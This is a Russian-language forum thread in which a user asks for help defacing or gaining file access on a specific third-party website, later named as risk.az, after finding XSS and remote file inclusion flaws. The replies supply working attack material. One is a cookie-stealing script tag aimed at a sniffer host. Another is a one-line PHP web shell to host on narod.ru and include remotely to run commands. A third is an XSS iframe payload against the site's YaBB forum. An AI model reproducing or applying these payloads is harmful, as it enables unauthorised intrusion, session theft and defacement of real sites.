Нашел уязвимость. Выполняется JavaScript: http://www.site.com:443/interesting/index.php?pg=<Sсгiрt>а1егt()</Sсгiрt> Warning: main(../interesting/info/.php): failed to open stream: No such file or directory in /www/hosts/www.site.com/html/interesting/index.php on line 39 Warning: main(): Failed opening '../interesting/info/<Sсгiрt>а1егt()</Sсгiрt>.php' for inclusion (include_path='.:') in /www/hosts/www.site.com/html/interesting/index.php on line 39 Потом просканил. Вот что мне выдал: 1) Серьезная уязвимость Выполнение кода, взятого с удаленного сервера Описание Уязвимость "Code Injection" с помощью запроса: http://www.site.com:443/interesting/index.php?pg=http://wwwwwwww/ позволяет атакующему выполнять произвольный код, взятый с удаленного сервера. 2) Уязвимость Реальный путь к серверу Описание Возможно получение реального пути к веб-серверу с помощью запроса: http://www.site.com:443/interesting/index.php?pg=http://wwwwwwww/ Описание Возможно получение реального пути к веб-серверу с помощью запроса: http://www.site.com:443/disks/index.php?pg=1' Описание Возможно получение реального пути к веб-серверу с помощью запроса: http://www.site.com:443/audio/index.php?pg=1' 3) Доступна информация Ссылки с параметрами Описание Список ссылок найденных на веб-сервере, которые используют какие-либо параметры: /interesting/index.php?pg=multios /archive/index.php?pg=010402 /disks/index.php?pg=SeaMed /audio/index.php?pg=Aopen 4) Доступна информация Доступ к директориям Описание Доступные директории: /admin/ /communications/ /proccesors/ /boards/ /video/ /disks/ /audio/ /security/ /interesting/ /archive/ 5) Недоступные директории Описание Cуществующие, но недоступные директории: /cgi-bin/ /forum/ /mp3/ /search/ /tmp/ /includes/ /img/ Помогите пожалуйста, каким образом можно добиться дефейса или же получить доступ к файлам?
Да, доступ туда есть, там написано: Администратор форума Логин: Пароль: Тока не говори мне что Брутить надо что-то мне сказали залить PHP шелл со своево сервака, но я не знаю как это сделать...
Уязвимость "Code Injection" с помощью запроса: http://www.site.com:443/interesting...ttp://wwwwwwww/ позволяет атакующему выполнять произвольный код, взятый с удаленного сервера. Ну раз есть такая дыра, то можно судя по всему выполнять команды. Ну вот эту брешь и юзай! Почитай статьи про php source injection и будет тебе счастье.
если выполняется произвольный код, значит есть уязвимость xss. вмечто кода алерта подставляй ссылку на снифер. бует примерно так: http:/www.site.com:443/interesting/index.php?pg=<script src="http://adressnifera"+document.cookie;></script> и пхп инекция, пробуй вместо <Sсгiрt>аlегt()</Sсгiрt> поставить ссылку на предворительно залитый табой шел. //может чё нить и получиться)
1) Сниффер молчит.... Вот ответ на заливку сниффера: Warning: main(../interesting/info/.php): failed to open stream: No such file or directory in /www/hosts/www.site.com:443/html/interesting/index.php on line 39 Warning: main(): Failed opening '../interesting/info/<script src=\"http://s.netsec.ru/xxx/pic.gif\" document.cookie;></script>.php' for inclusion (include_path='.:') in /www/hosts/www.site.com/html/interesting/index.php on line 39 2) А как Шелл делать?
снифер не надо ни куда заливать! ты должен дать ссылку(<script src="http://adressnifera"+document.cookie;></script>) и куки должны прити на твой снифер. а шел мона просто скачать от сюда а вообще не поленись зайти на яндекс/гугл и поискать что же такое шел и что делают со снифером!
<? system($cmd); ?> сохрани как shell.php и залей на народ судя по твоим данным сцылка будет такого вида http://www.site.com:443/interesting/index.php?cmd=ls&pg=http://site.narod.ru/shell
Попробовал все что вы сказали, через народ залить.... Может JavaScript-ом попробововать??? Вот ответ: Warning: main(../interesting/info/http://cnekmp2005.narod.ru/remview.php.php): failed to open stream: No such file or directory in /www/hosts/www.site.com/html/interesting/index.php on line 39 Warning: main(): Failed opening '../interesting/info/http://cnekmp2005.narod.ru/remview.php.php' for inclusion (include_path='.:') in /www/hosts/www.site.com/html/interesting/index.php on line 39
Вот ссылка, сами проверьте , тока пожалуйста не ломайте Мне это для научных исследований нужен http://www.risk.az:443/interesting/index.php?pg=1
Нашел ещё один уязвимость, только на форуме: http://www.risk.az:443/cgi-bin/forum/YaBB.pl?action=usersrecentposts;username=<IFRAME%20SRC%3Djavascript:alert('XSS')><%252FIFRAME> Что можно сделать в дальнейшем?